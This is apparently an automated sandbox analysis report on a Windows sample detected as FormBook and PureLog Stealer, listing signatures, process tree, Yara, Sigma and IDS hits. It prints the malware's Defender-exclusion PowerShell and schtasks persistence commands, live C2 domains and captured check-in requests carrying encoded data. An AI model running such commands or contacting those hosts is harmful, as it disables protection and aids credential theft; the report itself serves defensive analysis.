Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UnmxRI.exe

Overview

General Information

Sample name:UnmxRI.exe
Analysis ID:1501599
MD5:e34c33903020a81f3a09a69c29ade426
SHA1:864aaa5821e9f3e99da71eff1c8b76bcd1cdea80
SHA256:c9062d78ee63874928e2d332a8ed0570e99bc06e544e33f002b26f70e0c19510
Tags:exeformbook
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • UnmxRI.exe (PID: 6972 cmdline: "C:\Users\user\Desktop\UnmxRI.exe" MD5: E34C33903020A81F3A09A69C29ADE426)
    • powershell.exe (PID: 5416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6556 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 1408 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • UnmxRI.exe (PID: 5452 cmdline: "C:\Users\user\Desktop\UnmxRI.exe" MD5: E34C33903020A81F3A09A69C29ADE426)
      • NUJqNHNKrrpXWLOEvky.exe (PID: 6608 cmdline: "C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • print.exe (PID: 3092 cmdline: "C:\Windows\SysWOW64\print.exe" MD5: B6B0D7357995EFA5F07CEBD4593C7A9C)
          • NUJqNHNKrrpXWLOEvky.exe (PID: 5264 cmdline: "C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 428 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • tehuvFgZlLZK.exe (PID: 6844 cmdline: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe MD5: E34C33903020A81F3A09A69C29ADE426)
    • schtasks.exe (PID: 4112 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tehuvFgZlLZK.exe (PID: 5016 cmdline: "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe" MD5: E34C33903020A81F3A09A69C29ADE426)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2100365796.0000000006850000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x27a30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13c3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000000.00000002.2086201250.00000000026E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000000.00000002.2086201250.0000000002727000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 22 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          10.2.tehuvFgZlLZK.exe.26c1140.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.UnmxRI.exe.27089b0.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              10.2.tehuvFgZlLZK.exe.28f8b00.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.UnmxRI.exe.24d10ec.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.UnmxRI.exe.36139f0.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Click to see the 21 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UnmxRI.exe", ParentImage: C:\Users\user\Desktop\UnmxRI.exe, ParentProcessId: 6972, ParentProcessName: UnmxRI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", ProcessId: 5416, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UnmxRI.exe", ParentImage: C:\Users\user\Desktop\UnmxRI.exe, ParentProcessId: 6972, ParentProcessName: UnmxRI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", ProcessId: 5416, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe, ParentImage: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe, ParentProcessId: 6844, ParentProcessName: tehuvFgZlLZK.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp", ProcessId: 4112, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UnmxRI.exe", ParentImage: C:\Users\user\Desktop\UnmxRI.exe, ParentProcessId: 6972, ParentProcessName: UnmxRI.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp", ProcessId: 1408, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UnmxRI.exe", ParentImage: C:\Users\user\Desktop\UnmxRI.exe, ParentProcessId: 6972, ParentProcessName: UnmxRI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe", ProcessId: 5416, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UnmxRI.exe", ParentImage: C:\Users\user\Desktop\UnmxRI.exe, ParentProcessId: 6972, ParentProcessName: UnmxRI.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp", ProcessId: 1408, ProcessName: schtasks.exe

                    Suricata Signatures

                    Timestamp:2024-08-30T07:19:13.142223+0200
                    SID:2050745
                    Severity:1
                    Source Port:49726
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T07:18:35.434943+0200
                    SID:2050745
                    Severity:1
                    Source Port:49717
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T07:21:13.661153+0200
                    SID:2050745
                    Severity:1
                    Source Port:49750
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T07:20:51.661641+0200
                    SID:2050745
                    Severity:1
                    Source Port:49746
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T07:21:52.389719+0200
                    SID:2050745
                    Severity:1
                    Source Port:49758
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T07:19:49.860329+0200
                    SID:2050745
                    Severity:1
                    Source Port:49734
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T07:20:24.305204+0200
                    SID:2050745
                    Severity:1
                    Source Port:49738
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T07:21:35.712132+0200
                    SID:2050745
                    Severity:1
                    Source Port:49754
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T07:20:37.687030+0200
                    SID:2050745
                    Severity:1
                    Source Port:49742
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T07:19:35.231734+0200
                    SID:2050745
                    Severity:1
                    Source Port:49730
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T07:18:59.865503+0200
                    SID:2050745
                    Severity:1
                    Source Port:49722
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T07:22:07.118884+0200
                    SID:2050745
                    Severity:1
                    Source Port:49762
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://www.theranchobizarro.com/fgkz/Avira URL Cloud: Label: malware
                    Source: http://www.sciencebot.sbs/fgkz/?4f2t8=Es1t8vCK0sN7XyYvnVVOljQ55acH3Wz1kLP2QzEOa9660+rpR75GQvSkA30bAYbOR2lPGVNfcPr7Ljt/1l/fB9BodoBufVLUjg==&nFeHa=dbNpTjAvira URL Cloud: Label: malware
                    Source: http://www.nexgen-gaming.com/fgkz/Avira URL Cloud: Label: malware
                    Source: http://www.sciencebot.sbs/fgkz/Avira URL Cloud: Label: malware
                    Source: http://www.theranchobizarro.com/fgkz/?4f2t8=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe/nj9vDatoU4SrVQ==&nFeHa=dbNpTjAvira URL Cloud: Label: malware
                    Source: http://www.nexgen-gaming.com/fgkz/?nFeHa=dbNpTj&4f2t8=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unQYy2+VkzFUIUgoQ==Avira URL Cloud: Label: malware
                    Multi AV Scanner detection for domain / URL
                    Source: gpcamservices.comVirustotal: Detection: 8%Perma Link
                    Source: www.sportspaj.comVirustotal: Detection: 6%Perma Link
                    Source: nexgen-gaming.comVirustotal: Detection: 10%Perma Link
                    Source: noobblaster.comVirustotal: Detection: 8%Perma Link
                    Source: www.nathanladd.softwareVirustotal: Detection: 6%Perma Link
                    Source: www.gpcamservices.comVirustotal: Detection: 10%Perma Link
                    Source: www.pheonix-travels.comVirustotal: Detection: 6%Perma Link
                    Source: www.noobblaster.comVirustotal: Detection: 6%Perma Link
                    Source: http://www.theranchobizarro.com/fgkz/Virustotal: Detection: 5%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeReversingLabs: Detection: 65%
                    Multi AV Scanner detection for submitted file
                    Source: UnmxRI.exeReversingLabs: Detection: 65%
                    Source: UnmxRI.exeVirustotal: Detection: 68%Perma Link
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: UnmxRI.exeJoe Sandbox ML: detected
                    Source: UnmxRI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: UnmxRI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: firefox.pdbP source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: UnmxRI.pdbSHA2561 source: UnmxRI.exe, tehuvFgZlLZK.exe.0.dr
                    Source: Binary string: UnmxRI.pdb source: UnmxRI.exe, tehuvFgZlLZK.exe.0.dr
                    Source: Binary string: print.pdbGCTL source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4494941490.00000000014C8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152182094.0000000000A5E000.00000002.00000001.01000000.0000000D.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4494232519.0000000000A5E000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: wntdll.pdbUGP source: UnmxRI.exe, 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000003.2229738198.0000000000995000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2232359944.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: UnmxRI.exe, UnmxRI.exe, 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, print.exe, print.exe, 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000003.2229738198.0000000000995000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2232359944.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdb source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: print.pdb source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4494941490.00000000014C8000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004BC0B0 FindFirstFileW,FindNextFileW,FindClose,16_2_004BC0B0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 4x nop then pop edi16_2_004B1870
                    Source: C:\Windows\SysWOW64\print.exeCode function: 4x nop then xor eax, eax16_2_004A98C0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 4x nop then pop edi16_2_004AE137
                    Source: C:\Windows\SysWOW64\print.exeCode function: 4x nop then mov ebx, 00000004h16_2_00BB0531

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49726 -> 52.9.242.57:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49730 -> 91.195.240.19:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49746 -> 122.10.12.59:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49750 -> 91.195.240.19:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49717 -> 91.195.240.19:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49734 -> 119.18.54.85:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49742 -> 104.21.92.135:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49758 -> 212.32.237.90:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49722 -> 167.172.228.26:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49762 -> 167.172.228.26:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49738 -> 66.29.154.248:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49754 -> 216.40.34.41:80
                    Performs DNS queries to domains with low reputation
                    Source: DNS query: www.heilao9.xyz
                    Source: Joe Sandbox ViewIP Address: 52.9.242.57 52.9.242.57
                    Source: Joe Sandbox ViewIP Address: 212.32.237.90 212.32.237.90
                    Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
                    Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                    Source: Joe Sandbox ViewASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL
                    Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /fgkz/?4f2t8=qUFBQvWBSx+bgMqyDmLQ5iNb4eTiibWqPMlygN/fc4+dM2Q0fApyvpqDNInFWFQ7PUEWbfd7zdq6gjmLUkGdSLdX5yRbFI8ZXQ==&nFeHa=dbNpTj HTTP/1.1Accept: */*Accept-Language: en-usHost: www.pheonix-travels.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /fgkz/?nFeHa=dbNpTj&4f2t8=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unQYy2+VkzFUIUgoQ== HTTP/1.1Accept: */*Accept-Language: en-usHost: www.nexgen-gaming.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /fgkz/?4f2t8=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe/nj9vDatoU4SrVQ==&nFeHa=dbNpTj HTTP/1.1Accept: */*Accept-Language: en-usHost: www.theranchobizarro.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
